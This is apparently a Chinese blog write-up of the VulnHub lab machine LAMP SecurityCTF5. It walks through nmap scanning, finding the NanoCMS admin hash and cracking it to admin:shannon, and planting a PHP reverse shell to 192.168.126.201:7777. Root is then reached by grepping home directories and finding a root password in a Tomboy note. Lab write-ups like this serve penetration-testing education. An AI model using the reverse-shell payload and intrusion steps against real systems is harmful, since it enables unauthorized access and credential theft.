首页 > 其他分享 >13、LAMP SecurityCTF5(VulnHub)

13、LAMP SecurityCTF5(VulnHub)

时间:2024-05-06 10:46:02浏览次数:29  
标签:13 http SecurityCTF5 tcp LAMP 搜索 home 2.0 open

LAMP SecurityCTF5

一、nmap

image-20240328124549730

cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ','
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' > nmap_open_port_total.txt

image-20240328125119566

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
| ssh-hostkey: 
|   1024 05:c3:aa:15:2b:57:c7:f4:2b:d3:41:1c:74:76:cd:3d (DSA)
|_  2048 43:fa:3c:08:ab:e7:8b:39:c3:d6:f3:a4:54:19:fe:a6 (RSA)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
| smtp-commands: localhost.localdomain Hello [192.168.126.201], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
|_http-server-header: Apache/2.2.6 (Fedora)
|_http-title: Phake Organization
110/tcp   open  pop3        ipop3d 2006k.101
|_pop3-capabilities: LOGIN-DELAY(180) TOP UIDL USER STLS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:54+00:00; -3h58m23s from scanner time.
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100024  1          32768/udp   status
|_  100024  1          58217/tcp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0400)
|_imap-capabilities: NAMESPACE ESEARCH UNSELECT THREAD=REFERENCES CHILDREN BINARY LITERAL+ MAILBOX-REFERRALS SCAN IDLE IMAP4REV1 SASL-IR STARTTLSA0001 CAPABILITY WITHIN OK completed LOGIN-REFERRALS UIDPLUS THREAD=ORDEREDSUBJECT SORT MULTIAPPEND
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:55+00:00; -3h58m23s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)
901/tcp   open  http        Samba SWAT administration server
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.0 401 Authorization Required\x0D
|_  Basic realm=SWAT
3306/tcp  open  mysql       MySQL 5.0.45
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.45
|   Thread ID: 6
|   Capabilities flags: 41516
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: zxk0Mqp^hq{9F5vtezX(
58217/tcp open  status      1 (RPC #100024)

image-20240328125424687

image-20240328130536295

二、web渗透

目录爆破

image-20240328130602476

image-20240328130610784

image-20240328144917624

/events/

我们就先从这入手

image-20240328142951307

image-20240328143228862

/events/robots.txt

image-20240328143630983

searchsploit

image-20240328144758269

image-20240328144305809

image-20240328144855979

/events/就先到这把,刚刚有一个注册登入的也貌似不行

/~andy/data/nanoadmin.php

image-20240328145214626

image-20240328145246030

貌似想要先登入进去才可正常利用

image-20240328150416569

google一下

image-20240328150620037

image-20240328150628427

/data/pagesdata.txt

还真是

image-20240328150647124

s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";

admin:shannon

image-20240328151035603

/~andy/data/nanoadmin.php

admin:shannon 		成功登入

image-20240328151303294

/~andy/index.php?page=123

image-20240328151312734

image-20240328151322652

php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.201/7777 0>&1'")?>

image-20240328151503229

image-20240328151510003

image-20240328151559624

三、内网渗透

README\ FIRST.txt

image-20240328151738834

/home

image-20240328151856224

Permission denied test.txt

image-20240328153035970

/etc/crontab

image-20240328152921917

searchsploit尝试提权

image-20240328153835021

image-20240328153855107

/etc/passwd

image-20240328153934041

查看存在passwd字眼的文件内容

结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。我们在/home目录搜索一下包含'pass'字符串的文件有哪些

grep -R -i pass /home/* 2>/dev/null

该命令的含义是在/home/目录下递归搜索包含不区分大小写的字符串"pass"的文件,并将搜索结果输出到标准输出。命令的具体解释如下:
grep: 是一个用于在文件中搜索指定模式的命令。
-R: 表示递归搜索,将在指定目录及其子目录下搜索文件。
-i: 表示忽略大小写,在搜索时不区分大小写。
pass: 是要搜索的字符串模式。
/home/*: 搜索的目录路径,/home/表示在/home/目录下搜索,*表示搜索所有子目录和文件。
2>/dev/null: 将标准错误输出重定向到/dev/null设备,这样错误信息将被丢弃而不会显示在终端上。

结果搜到了非常多的文件,我们慢慢往下翻找,最终发现/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note含有一个title标签,为Root password,这很可能就是root密码所在

image-20240328154528872

su - 成功提权

bash-3.2$ su -
Password: 50$cent

image-20240328154704133

标签:13,http,SecurityCTF5,tcp,LAMP,搜索,home,2.0,open
From: https://www.cnblogs.com/carmi/p/18174484

相关文章

  • LeetCode 1373. Maximum Sum BST in Binary Tree
    原题链接在这里:https://leetcode.com/problems/maximum-sum-bst-in-binary-tree/description/题目:Givena binarytree root,return themaximumsumofallkeysof any sub-treewhichisalsoaBinarySearchTree(BST).AssumeaBSTisdefinedasfollows:Thel......
  • qoj1138 Counting Mushrooms
    交互题。有一个隐藏的01序列\(a\),你只知道\(a\)的长度,并记为\(n\)。保证\(a_1=0\)。你可以执行以下操作:询问一个序列\(b\),满足两两不同且长度在\([2,1000]\)之间。交互库会返回\(\sum[a(b_i)\not=a(b_{i+1})]\)。请在\(226\)次操作内求出\(a\)中\(0\)......
  • 2024年13个最佳Scrum工具评测
    Scrum 管理工具有:PingCode、Jira、Trello、ZohoSprints、ActiveCollab、ProProfsProject、Scrumwise、ClickUp、Monday.com、QuickScrum、Yodiz、ScrumDo、nTask在过去几年中,Scrum方法论已成为敏捷项目管理的主要框架之一。使用Scrum,项目管理过程将变得更加灵活和透明,同时......
  • hdu1213并查集
    第一种方法是定义每个数的老大是其自身,通过每次输入的两个数,找到它两的老大,比较大小,循环将所有大的那个老大改为小的那个数,最后输出有几个老大是其自身,案例都能过,提交就错,不知错哪了......点击查看代码importjava.util.Scanner;publicclasshdu1213{ publicstaticvoid......
  • Django Error: [WinError 10013] An attempt was made to access a socket in a way f
      D:\06softw-dev-202306\manage.pyrunserverWatchingforfilechangeswithStatReloaderPerformingsystemchecks...Systemcheckidentifiednoissues(0silenced).May03,2024-10:02:12Djangoversion3.2.18,usingsettings'MPDB.settings......
  • mORMot 1.18 第13章 动态数组
    mORMot1.18第13章动态数组众所周知,数组是非常有用的。但在现实生活中,情况是不可预测的,数组的元素数量或大小可能会随着时间的推移而增长。有些语言,如PHP,就使得动态数组的使用变得很简单。在使用mORMot的Delphi中,我们使用类和方法来提供这一功能。首先,让我们声明一个典型的TS......
  • UVA1362 Exploring Pyramids 题解
    题目传送门前置知识欧拉序|区间DP|乘法原理解法DFS序可近似理解为欧拉序,故考虑区间DP。设\(f_{l,r}\)表示\([l,r]\)对应的二叉树的个数,状态转移方程为\(f_{l,r}=\begin{cases}1&l=r\\[s_{l}=s_{r}]\times\sum\limits_{i=l+2}^{r}[s_{l}=s_{i}]\timesf_{......
  • 1385E. Directing Edges(拓扑序的应用)
    背景:本题为构造DAG题,给出了有向与无向边,CF2000分题目思路:先处理有向图,判断是否有环,有就NO,否则一定有解.我们思考一下有环的条件(或者说环在什么情况下产生):即后面的数指向前面的数才可能构成环,即拓扑序大的指回去了!故得构造思路:即让无向边的拓扑序小的指......
  • [题解]CF13C Sequence
    CF13CSequence给定\(N\)个数,每次操作可以选其中一个数\(+1\)或\(-1\)。请问要让这个数列不降,最少需要多少次操作?我们用DP解决。对\(a\)从小到大排序,存在\(c\)中。我们用\(f[i][j]\)表示让前\(i\)个元素满足条件,而且这些元素最大值不超过\(c[j]\)的最小操作次数。状态转移方......
  • P1969 [NOIP2013 提高组] 积木大赛
    P1969[NOIP2013提高组]积木大赛题目春春幼儿园举办了一年一度的“积木大赛”。今年比赛的内容是搭建一座宽度为\(n\)的大厦,大厦可以看成由\(n\)块宽度为\(1\)的积木组成,第\(i\)块积木的最终高度需要是\(h_i\)。在搭建开始之前,没有任何积木(可以看成\(n\)块高度为......